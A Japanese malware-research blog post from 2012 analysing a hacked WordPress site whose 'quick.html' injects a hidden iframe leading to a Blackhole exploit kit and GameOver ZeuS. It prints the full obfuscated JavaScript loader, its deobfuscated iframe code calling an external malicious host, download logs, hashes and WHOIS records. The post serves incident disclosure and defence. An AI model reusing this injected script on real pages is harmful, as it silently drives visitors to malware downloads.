日曜日, 3月 18, 2012

#OCJP-027: 日本のホスティングでWordPressのwp-includesの脆弱性(CVE-2011-3130)が持っているサイトにZeuSトロイ関係のJS/IFRAMEマルウェアを発見しました。 【対応最中】


今回WordPressの脆弱性が入っているサイトにBlackholeトロイがインジェックトされた事件を発見しました。インジェクトの方法はまさにSQL Injection経由かと思われます(下記脆弱性の情報を確認が出来ます)、この可能性が一番高いです、私の権限ですが、SQL Injectionの結果でアップロードされたファイルの実行権限が出ます。丁度本事件の感染されたパスを見たらwp-includesの関係を見えますので、最近のCVE情報に当たります。
他の可能性を考えると、インジェクトされたファイルはフールHTMLファイルですので、アップロードARBITARY脆弱性が出ます。また、FTPアカウントが盗まれてしまった可能性も高いです(同じサーバで沢山WPドメインがあるので、1つだけは感染された)。
明確な感染仕組みはこのブログ内容情報を使いHTTPログで調査したら直ぐに分かると思いますので、サーバの管理者様にお任せております。さて、詳細情報に付いて以下のレポートをご覧下さい。

■本事件に関係ある脆弱性に付いて↓

可能性として、感染されたWordPressのサイトは下記の脆弱性のどっちかがありそうですが↓
CVE-2011-3122, CVE-2011-3126
CVE-2011-3127, CVE-2011-3128,
CVE-2011-3129
CVE-2011-3130 ←URLのパスを見たらこの脆弱性の可能性が高いです(wp-includes)。

上記の脆弱性のリファレンスは下記となります↓
1. CVE-2011-3130 (Taxonomy/wp-includes SQLi)
2. BID-47995 WordPress Multiple Vulnerabilities
3. IBM ISS Wordpress-taxonomy-unspecified (69169)
4. Microsost Sec. Advisory - MSVR11-010
※WordPressよりWordPress バーション3.1.3以降、脆弱性が直されたので、バーションの確認が必要です。

■感染されたサービス/IP↓ tpjapan3.info / 182.48.12.157

■感染されたURL↓ hxxp://tpjapan3.info/wp-includes/quick.html hxxp://www.tpjapan3.info/wp-includes/quick.html

■ダウンロード証拠↓ --20:38:23-- hxxp://tpjapan3.info/wp-includes/quick.html => `quick.html' Resolving tpjapan3.info... 182.48.12.157 Connecting to tpjapan3.info|182.48.12.157|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2,889 (2.8K) [text/html] 100%[====================================>] 2,889 --.--K/s 20:38:23 (90.48 MB/s) - `quick.html' saved [2889/2889] >ls -alF *.html -rwx------ 1 unix- freaxjp 2889 Mar 6 02:31 quick.html* 【注意】↑ファイルの日付けはイコールファイルのアップロードされた日付けです。     この情報はログの調査の時に必要です。

■マルウェア情報↓ アファイル  :「quick.html」 マルウェア種類: Trojan (トロイ) JavaScript Obfuscated IFRAME マルウェア名 : Script/Exploit.Kit, Exploit.JS.Blacole, Trojan.Script.Iframer, Exploit:JS/BlacoleRef, JS/Iframe マルウェア機能: トロイ 説明     : 本マルウェアに感染されたサイトをクリックされると、Blackholeサイトへ飛ばされる そしてBlackholeサイトが用意されたマルウェアがダウンロードされてしまいます。

■マルウェアのスキャン結果↓ File name: quick.html File type: HTML MD5: 8cdb91d988a138fb8d1b7880eca6e9e0 File size: 2.8 KB ( 2889 bytes ) Detection ratio: 25 / 43 Analysis date: 2012-03-18 15:32:54 UTC Result: [CLICK]

■マルウェアの調査↓ 1. 感染されたHTMLに下記のコードが書いてあります↓ >cat quick.html <html> <title>Intuit</title> <h1>Quickbooks</h1> <h3>Loading your order, please wait..</h3> <h4></h4> : <script>if(window.document)try{location(12);}catch(qqq){zz='eval';ss=[];aa=[]+0; aaa=0+[];if(aa.indexOf(aaa)===0){f='fromChar';f+='Code';}ee='e';e=window[zz];t=' y';}h=-2*Math.log(Math.E);n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a5 4a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a4 7.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a5.5a3.5a3 .5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a5.5a3.5a3.5a61.5a15a49.5a53a56. 5a49.5a15a60.5a5.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5 a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a5 5a28a22.5a22.5a51.5a48.5a49.5a53.5a49.5a49a22a54a49.5a57a22.5a53.5a47.5a51.5a54a 22a55a51a55a30.5a55a47.5a50.5a49.5a29.5a50a50a47.5a23.5a48a49.5a49a24.5a49.5a50a 26.5a48.5a49.5a48a24a24.5a18.5a15a58.5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a5 1a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a 58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a 56.5a51.5a57a51.5a54.5a54a28a47.5a48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a5 7a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a 16a19.5a28.5a5.5a3.5a3.5a61.5a5.5a3.5a3.5a50a57.5a54a48.5a57a51.5a54.5a54a15a51. 5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a5.5a3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a 15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a5 3.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a 57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57 a55a28a22.5a22.5a51.5a48.5a49.5a53.5a49.5a49a22a54a49.5a57a22.5a53.5a47.5a51.5a5 4a22a55a51a55a30.5a55a47.5a50.5a49.5a29.5a50a50a47.5a23.5a48a49.5a49a24.5a49.5a5 0a26.5a48.5a49.5a48a24a24.5a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5 a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a 22a56.5a57a59.5a53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a5 6.5a54.5a53a57.5a57a49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a2 9.5a18.5a23a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5 a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49 a57a51a18.5a21a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5 a48a57.5a57a49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a 28.5a5.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a4 9.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a 49a59.5a18.5a19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50 a19.5a28.5a5.5a3.5a3.5a61.5".split("a");for(i=0;i<605;i++){j=i;ss=ss+String[f](- h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);</script>  : </html> 2. 前回のブログ内容に説明したように<script>から</script>迄のコードをdeobfs したら、下記の様に読めるになった↓ if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write(" <iframe src='hxxp://icemed.net/main.php?page=ffa1bed3ef7ceb23' width='10' height='10' styl e='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe'); f.setAttribute('src', 'hxxp://icemed.net/main.php?page=ffa1bed3ef7ceb23'); f.style.visibility = 'hidden'; f.style.position = 'absolute'; f.style.left = '0'; f.style.top = '0'; f.setAttribute('width', '10'); f.setAttribute('height', '10'); document.getElementsByTagName('body')[0].appendChild(f); } 3. それで下記のIFRAMEコードが実行されてしまいます↓ <iframe src='hxxp://icemed.net/main.php?page=ffa1bed3ef7ceb23' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> 4. 上記のURLを実行されたらユーザが下記のサイトへ飛ばされています、画像は↓    5. ↑上記はBlackholeのinfectorサイトです。 アクセスされたら下記のファイルがダウンロードされます↓ File: yqda.exe MD5: 17bde98108092ed612c4511bd6a633ee Size: 278,016 Other: This file is digitally signed by ’123f4123′ Company: 2q3wet Corporation Description: Windows TaskManager InternlName: taskmgr Copyright: Copyright (C) 2q3wet Corp. 1991-1999 Original: taskmgr.exe Product: 2q3wet(R) Windows (R) 2000 Operating System Timestamp: 2012:03:04 15:01:05+01:00 ↑信じられない偶然ですが、以前発見した「GAMEOVER ZeuS」と同じMD5とサイズです。 恐らく本件の感染にもGameOver ZeuSを提供しているBlackHoleトロイに感染されたかと思われます。

■どんなマルウェアの仕組みですか?↓ 最近下記のスパムが流行っています.... ↑日本にも沢山届いたので、スパムメールのリンクに本件の感染されたサイトのURLが 書いてありますので、K-SHIELDスパム対策製品のログ調査の上で発見しました。 上記の画像をクリックすると大きく見えます。 そして、Blackhole infectorのURLを調査したら下記の情報を確認が出来ました↓ URL hxxp://icemed.net/main.php?page=ffa1bed3ef7ceb23 IP 208.91.197.54 ASN AS40034 Confluence Networks Inc Location [Virgin Islands, British] Virgin Islands, British Report created 2012-03-12 20:42:19 CET Status Report complete. Alerts Detected Blackhole exploit kit v1.2 HTTP GET request ↑このURLは既にあちこちのブラックリストに登録の手続きしました。 ■感染されたサイトに付いて↓ URLを見た限りWordPress CMSのサイトですね、 ドメイン情報は↓ Domain ID:D36537706-LRMS Domain Name:TPJAPAN3.INFO Created On:27-Jan-2011 04:44:41 UTC Last Updated On:06-Jan-2012 04:49:29 UTC Expiration Date:27-Jan-2013 04:44:41 UTC Sponsoring Registrar:GMO Internet, Inc. d/b/a Onamae.com (R110-LRMS) Status:OK Registrant ID:12DC5C99654 Registrant Name:Whois Protect Service Registrant Organization:GMO Internet Inc. Registrant Street1:26-1 Sakuragaoka-cho Registrant Street2:Cerulean Tower 11F Registrant City:Shibuya-ku Registrant State/Province:Tokyo Registrant Postal Code:150-8512 Registrant Country:JP Registrant Phone:+81.0303648727 Registrant Email:admin@onamae.com IP情報は↓ inetnum: 182.48.12.0 - 182.48.12.255 netname: SAKURA-NET descr: SAKURA Internet Inc. country: JP admin-c: KT749JP tech-c: KW419JP remarks: This information has been partially mirrored by APNIC from remarks: JPNIC. To obtain more specific information, please use the remarks: JPNIC WHOIS Gateway at remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client remarks: defaults to Japanese output, use the /e switch for English remarks: output) changed: apnic-ftp@nic.ad.jp 20101020 source: JPNIC インターネット・ルーティング図↓ ↑ホスティング会社ですので、沢山サービスを提供しております。 恐らく何ドメインがWordPressサービスを使っているかと思われます。 他のドメインの関係は下記の図に確認が出来ます↓ ↑本件の問題が起きない様に、最新版WordPressパッケージを使えるように確認した方がいいと思います。

----
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.

1 件のコメント:

  1. Sun Apr 8 14:16:25 JST 2012

    感染されたHTMLファイルが未だアップされている状況です。本日迄は報告してから3週間ぐらい立ったけど。。。

    証拠↓

    --14:16:13-- hxxp://tpjapan3.info/wp-includes/quick.html
    => `quick.html'
    Resolving tpjapan3.info... 182.48.12.157
    Connecting to tpjapan3.info|182.48.12.157|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 2,889 (2.8K) [text/html]
    100%[====================================>] 2,889 --.--K/s
    14:16:14 (75.86 MB/s) - `quick.html' saved [2889/2889]

    返信削除